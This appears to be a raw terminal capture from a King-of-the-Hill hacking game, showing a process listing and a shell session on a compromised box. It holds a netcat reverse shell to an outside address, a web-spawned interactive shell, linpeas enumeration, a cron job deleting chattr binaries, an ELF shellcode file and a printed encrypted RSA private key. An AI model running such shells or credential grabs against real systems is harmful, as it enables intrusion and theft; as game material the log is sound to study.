root       371     2  0 18:02 ?        00:00:00   [iw_cm_wq]
root       372     2  0 18:02 ?        00:00:00   [rdma_cm]
root       373     2  0 18:02 ?        00:00:00   [kauditd]
root      2293     2  0 18:17 ?        00:00:00   [kworker/0:3]
root      2822     2  0 18:22 ?        00:00:00   [kworker/u30:2]
root      2889     2  0 18:23 ?        00:00:00   [kworker/0:0]
root      3942     2  0 18:33 ?        00:00:00   [kworker/u30:1]
root      9994     2  0 18:38 ?        00:00:00   [kworker/0:1]
root         1     0  0 18:02 ?        00:00:05 /sbin/init
root       362     1  0 18:02 ?        00:00:00   /lib/systemd/systemd-journald
root       399     1  0 18:02 ?        00:00:00   /sbin/lvmetad -f
root       414     1  0 18:02 ?        00:00:00   /lib/systemd/systemd-udevd
systemd+   500     1  0 18:02 ?        00:00:00   /lib/systemd/systemd-timesyncd
root       704     1  0 18:02 ?        00:00:00   /sbin/dhclient -1 -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
root       886     1  0 18:02 ?        00:00:00   /usr/sbin/sshd -D
root      2611   886  0 18:19 ?        00:00:00     sshd: gloria [priv]
gloria    2664  2611  0 18:19 ?        00:00:00       sshd: gloria@pts/3
gloria    2667  2664  0 18:19 pts/3    00:00:00         -bash
root      2830   886  0 18:23 ?        00:00:00     sshd: gloria [priv]
gloria    2862  2830  0 18:23 ?        00:00:00       sshd: gloria@pts/1
gloria    2863  2862  0 18:23 pts/1    00:00:00         -bash
gloria    3155  2863  0 18:26 pts/1    00:00:02           /bin/sh ./linpeas.sh
gloria   21761  3155 69 18:42 pts/1    00:00:01             find / -perm -2000 -type f ! -path /dev/*
root      3475   886  0 18:28 ?        00:00:00     sshd: gloria [priv]
gloria    3518  3475  0 18:28 ?        00:00:00       sshd: gloria@pts/5
gloria    3519  3518  0 18:28 pts/5    00:00:00         -bash
gloria    7471  3519  0 18:36 pts/5    00:00:00           tmux -S /.dev/session
root      4051   886  0 18:33 ?        00:00:00     sshd: gloria [priv]
gloria    4094  4051  0 18:34 ?        00:00:00       sshd: gloria@pts/7
gloria    4095  4094  0 18:34 pts/7    00:00:00         -bash
gloria    4170  4095  0 18:35 pts/7    00:00:00           /usr/bin/tmux -S /.dev/session
root      9784   886  0 18:38 ?        00:00:00     sshd: daemonstaff [priv]
daemons+ 10111  9784  0 18:38 ?        00:00:00       sshd: daemonstaff@pts/11
daemons+ 10123 10111  0 18:38 pts/11   00:00:00         -bash
root     10309 10123  0 18:38 pts/11   00:00:00           sudo -s
root     10465 10309  0 18:38 pts/11   00:00:00             /bin/bash
root     18977   886  0 18:41 ?        00:00:00     sshd: rsyslogd@notty
root     20121 18977  0 18:41 ?        00:00:00       sh -c /bin/sh
root     20122 20121  0 18:41 ?        00:00:00         /bin/sh
root       889     1  0 18:02 ?        00:00:00   /usr/sbin/cron -f
root     21548   889  0 18:42 ?        00:00:00     /usr/sbin/CRON -f
root     21581 21548  0 18:42 ?        00:00:00       /bin/sh -c /usr/bin/find / -name "chattr" -exec rm -rf {} \;
root     21612 21581 15 18:42 ?        00:00:00         /usr/bin/find / -name chattr -exec rm -rf {} ;
root       894     1  0 18:02 ?        00:00:00   /usr/sbin/acpid
root       897     1  0 18:02 ?        00:00:00   /usr/lib/accountsservice/accounts-daemon
daemon     900     1  0 18:02 ?        00:00:00   /usr/sbin/atd -f
root       910     1  0 18:02 ?        00:00:00   /root/koth
gloria     930     1  0 18:02 ?        00:00:18   /usr/local/sbin/nhttpd
root       938     1  0 18:02 ?        00:00:00   /lib/systemd/systemd-logind
root       940     1  3 18:02 ?        00:01:29   /usr/bin/lxcfs /var/lib/lxcfs/
message+   947     1  0 18:02 ?        00:00:00   /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
syslog     951     1  0 18:02 ?        00:00:00   /usr/sbin/rsyslogd -n
root       977     1  0 18:02 ?        00:00:00   /usr/lib/snapd/snapd
root       990     1  0 18:02 ?        00:00:00   /sbin/iscsid
root       991     1  0 18:02 ?        00:00:00   /sbin/iscsid
mysql      996     1  0 18:02 ?        00:00:01   /usr/sbin/mysqld
root      1008     1  0 18:02 ?        00:00:00   php-fpm: master process (/etc/php/7.0/fpm/php-fpm.conf)
gloria    1028  1008  0 18:02 ?        00:00:01     php-fpm: pool www
gloria    4041  1028  0 18:33 ?        00:00:00       sh -c uname -a; w; id; /bin/sh -i
gloria    4045  4041  0 18:33 ?        00:00:00         /bin/sh -i
gloria    1029  1008  0 18:02 ?        00:00:00     php-fpm: pool www
gloria    5621  1008  0 18:35 ?        00:00:00     php-fpm: pool www
root      1019     1  0 18:02 ?        00:00:00   /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
root      1025     1  0 18:02 ?        00:00:00   nginx: master process /usr/sbin/nginx -g daemon on; master_process on;
www-data  1026  1025  0 18:02 ?        00:00:05     nginx: worker process
root      1030     1  0 18:02 ?        00:00:00   /usr/lib/policykit-1/polkitd --no-debug
root      1129     1  0 18:02 ttyS0    00:00:00   /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220
root      1137     1  0 18:02 tty1     00:00:00   /sbin/agetty --noclear tty1 linux
root      1159     1  0 18:02 ?        00:00:03   /usr/sbin/apache2 -k start
alex      2118  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2147  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2149  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2165  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2208  1159  0 18:16 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2231  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2242  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2325  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2440  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
alex      2441  1159  0 18:17 ?        00:00:02     /usr/sbin/apache2 -k start
root      1223     1  0 18:02 ?        00:00:00   /usr/bin/tmux -S /.dev/session new-session -d
root      1224  1223  0 18:02 pts/0    00:00:00     -sh
root      3742  1223  0 18:30 pts/6    00:00:00     -sh
root      3885  1223  0 18:32 pts/4    00:00:00     -sh
root      3954  1223  0 18:33 pts/8    00:00:00     -sh
root      4061  1223  0 18:33 pts/2    00:00:00     -sh
root      4171  1223  0 18:35 pts/9    00:00:00     -sh
root      7164  4171  0 18:36 pts/9    00:00:00       bash
root      7476  1223  0 18:36 pts/10   00:00:00     -sh
gloria    1650     1  0 18:09 ?        00:00:00   bash
gloria    1651  1650  0 18:09 ?        00:00:00     bash -i
gloria    1693     1  0 18:10 ?        00:00:01   systemd-pam
root      2073     1 16 18:15 pts/0    00:04:17   bash -i
root      2180     1 12 18:16 pts/0    00:03:18   bash -i
root      2420     1  0 18:17 pts/0    00:00:02   systemd-pam
gloria    2617     1  0 18:19 ?        00:00:00   /lib/systemd/systemd --user
gloria    2621  2617  0 18:19 ?        00:00:00     (sd-pam)
gloria    3063     1  4 18:25 ?        00:00:46   /usr/bin/python3 -
gloria    3123  3063  0 18:26 ?        00:00:00     [sh] <defunct>
root      3664     1  0 18:29 ?        00:00:00   /lib/systemd/systemd --user
root      3666  3664  0 18:29 ?        00:00:00     (sd-pam)
root      3788     1  0 18:30 ?        00:00:00   tcpdump -i any -w /tmp/.systmd-private-c8egwc932h89fh3298
gloria    4117     1  0 18:34 ?        00:00:00   nc -l 127.0.0.1 12345
gloria    8220     1  0 18:36 ?        00:00:00   nc 10.6.33.29 4444
gloria    8221     1  0 18:36 ?        00:00:00   /bin/sh
gloria   21762  8221  0 18:42 ?        00:00:00     ps -efH
daemons+  9993     1  0 18:38 ?        00:00:00   /lib/systemd/systemd --user
daemons+  9998  9993  0 18:38 ?        00:00:00     (sd-pam)
gloria   15760     1  0 18:40 ?        00:00:00   nc -l 127.0.0.1 42069
/usr/bin/tmux -S /.dev/session
open terminal failed: not a terminal
whooooammi
/bin/sh: 37: whooooammi: not found
whoami
gloria
python3 -c 'import pty; pty.spawn("/bin/bash")'
ls
alex
gloria
marty
cd gloria
ls -lisa
total 48
406255 4 drwxr-xr-x 6 gloria gloria 4096 Oct  4 18:42 .
393344 4 drwxr-xr-x 5 root   root   4096 May  1  2020 ..
407716 0 lrwxrwxrwx 1 root   root      9 May  2  2020 .bash_history -> /dev/null
406256 4 -rw-r--r-- 1 gloria gloria  220 May  1  2020 .bash_logout
406257 4 -rw-r--r-- 1 gloria gloria 3771 May  1  2020 .bashrc
393819 4 drwx------ 2 gloria gloria 4096 Oct  4 18:17 .cache
405641 4 drwxr-x--- 3 gloria gloria 4096 Oct  4 18:36 .config
405966 4 drwx------ 2 gloria gloria 4096 Oct  4 18:39 .gnupg
406258 4 -rw-r--r-- 1 gloria gloria  655 May  1  2020 .profile
406038 4 drwx------ 2 gloria gloria 4096 May  3  2020 .ssh
405974 4 -rw-r--r-- 1 gloria gloria  207 Oct  4 18:40 lib64
408394 4 -r-------- 1 gloria gloria   38 May  2  2020 user.txt
405989 4 -rw-r--r-- 1 gloria gloria  195 Oct  4 18:42 user1
cat user1
.ELF....................T...4...........4. .............................2...........j}X..........f......1...SCSj....f..Qj.Tj.j.P...j.[jfX.......Y[^Rh....j.QP..jfX.....f..WC.f.Q............[......



ls
lib64
user.txt
user1
cd .ssh
ls -lisa
total 20
406038 4 drwx------ 2 gloria gloria 4096 May  3  2020 .
406255 4 drwxr-xr-x 6 gloria gloria 4096 Oct  4 18:42 ..
406248 4 -rw-r--r-- 1 gloria gloria  393 May  3  2020 authorized_keys
406202 4 -rw------- 1 gloria gloria 1766 May  3  2020 id_rsa
406203 4 -rw-r--r-- 1 gloria gloria  393 May  3  2020 id_rsa.pub
cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,DEA2FCB97D9A7EE91BB5502188F24BCA

5m/tHlXFlre3iBu/0wnnfEyS/p7qd0yjLDuG3jblth2CpwqIvPjGGq6hoFr6xdZO
8DOR/D16XDblHvvpJBlVfqHuXzIFbqDYCgvAeB8cZbxLaqhSi0H5fHT+N0MrMM5H
p3ejg2Nwk67BxygtjnvYgXKu+ALk0/NLDAj0NzztX+yOsSPvsyR2UjUSo352pMBt
lokw3kshMcqKs0G1UhBphV5bUgUTA0nPi5WBlIdmWC+Re0EHH+RvLulg0AxR6v5Q
UxqJJ/i0dLp6N7nTFANde+I5JwPEDJ/SGJJRWB/srcpVz3PSZuEJht83nmcJRZCz
S/x7iOhIUA1vBlexg/Td911H/95sofArhZDMPX54IMO7/q5AfIjDpqD8U9Pts7R0
aBq+1m2RfVB85FM11kJv5T0uNW6t5dP8BVb7Jqz60okgJg4cJMu5YMX7vj3xCxxy
5Hlc7PA/kIy/y2tRJmArvheuFB7qjRIPcuw1gw1TKDCUHS29aiN+ePCS4f236/if
9VwHnfp8wCUnO6ApRX9sJ6iAPMA8JYFpylIL/0XqEjZdu+ESWetTfGzsxXRdeNkY
L1/H4W9mNNIbNTnL3irr4SuKowFpKwxp6xhloZ4boyiWsdfLpmtUBE5euxjlppWp
2y7ZbtuKiqdTHkhPOZOnx7oi2FmWw81P4wS6nF2ObPpSq5LGf9TiLEw5i0icedkp
rnd/qkhkBuIQb6CKlW9m3AXgMRVQXa78J1lx60FdO1B9mtuhOy529GcwVkWh856x
MesHWvY33GmW0QcVKnUqhhFDbkT0l/X7UERTMAHVKZhfPeChuo/7LoqUqdMI57Se
U66OS9bu0INLLwcSlOAL9aweynt8MFo1DS+xQsJWTLSBnVz7iT6IMYUfhtO3gi5/
Oginxw/FPmGJ6THuFWi15k9dDdO3nBJhAQDHRpMYi4BLm/xPF7EXhgiGy6sBVGrF
PYlXHZvlQEJvHd/DCw0uwolEc3z4CilGKz1BX0WbCp9cEgkmM+Ez7QTvvBa5i6kg
qh1pAaZ+cNFDJi9bn76qEaCLCd1FMPnpcZgMUgwBfyKM+1YXa0gbxlS8fqgU066j
Mol50cLTM8D4tny3OvPcjW4FveCkhqJjGK7DY1Us7R3VDWAjOYIaMqSIM2ip6iLZ
ukq7K1r0t68eVDuDGcMLjfVihGywyqglqnqaXYcJ8+19ae76E3HVFIWbSU409fMp
fs8r6QLnuxvX1HHa74Hctuo6fzB7qokKV51ChmpXjN8h5uwEl0msbJSrKlIeYy0S
uURTlfqDq50HBr2yJYeuDzEpRjZuucXqkCIRZLSjKedf9mBtMq/3CvN9K/P45A2H
BYxl0pcZPaeUiwdR/bycLK1tBZm5kVSGIU2fK7IsKrgqZxzKS6kdr2FFsKs3HWMF
ScVJZPT4dqDo3PSIQUw7q0GixCLLdDU9p45CSKPVySYyiGU22RTQS2ccGEcCTurj
lcY0pO4wZmm5GkseF5moa/1c3aOUZOESAlWGpEg5PNPt3U/SWJTpziGv3NY5DLq9
R9OsbX0gkO711f8RvRTELQIYFIO/0LcKTjY16g8MtBlMKYCyJ0cWLVWAUoggJxiR
-----END RSA PRIVATE KEY-----
